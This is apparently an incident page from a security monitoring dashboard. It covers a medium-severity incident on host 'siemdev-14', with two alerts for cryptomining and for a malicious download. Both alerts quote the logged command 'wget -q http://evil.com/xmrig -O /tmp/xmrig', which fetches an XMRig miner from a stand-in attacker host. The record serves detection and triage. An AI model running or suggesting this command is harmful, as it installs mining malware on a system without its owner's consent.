Back to list

Incident Overview

Incident ID CINC-20251220-91E6F465
Severity Medium (70)
Status new
Alert Count 2
Host Count 1

Timeline

First Seen 2025-12-20 22:08:37
Last Seen 2025-12-20 22:08:37
Duration 0d 0h 0m
Created 2025-12-20 23:35
Updated 2026-01-13 15:14

Kill Chain Analysis

Rec... Ini... Exe... Per... Pri... Def... Cre... Dis... Lat... Col... Com... Exf... Imp...
Observed Tactics:
Execution Command and Control
Techniques:
Command and Scripting Interpreter Ingress Tool Transfer

Affected Hosts (1)

siemdev-14

Related Alerts (2)

Severity Status Hostname Description Tactic Command Line Time
High new siemdev-14 A script launched with a command line that is often associated with Cryptomining software. If this is unexpected, review the process tree. Execution wget -q http://evil.com/xmrig -O /tmp/xmrig 12-20 22:08
High new siemdev-14 An attempt to download malicious files from the command-line interface has been detected on your host. Adversaries might use curl or wget to download additional payloads in case of compromise. Please review the event to determine if malicious files were downloaded or if this access was expected. Command and Control wget -q http://evil.com/xmrig -O /tmp/xmrig 12-20 22:08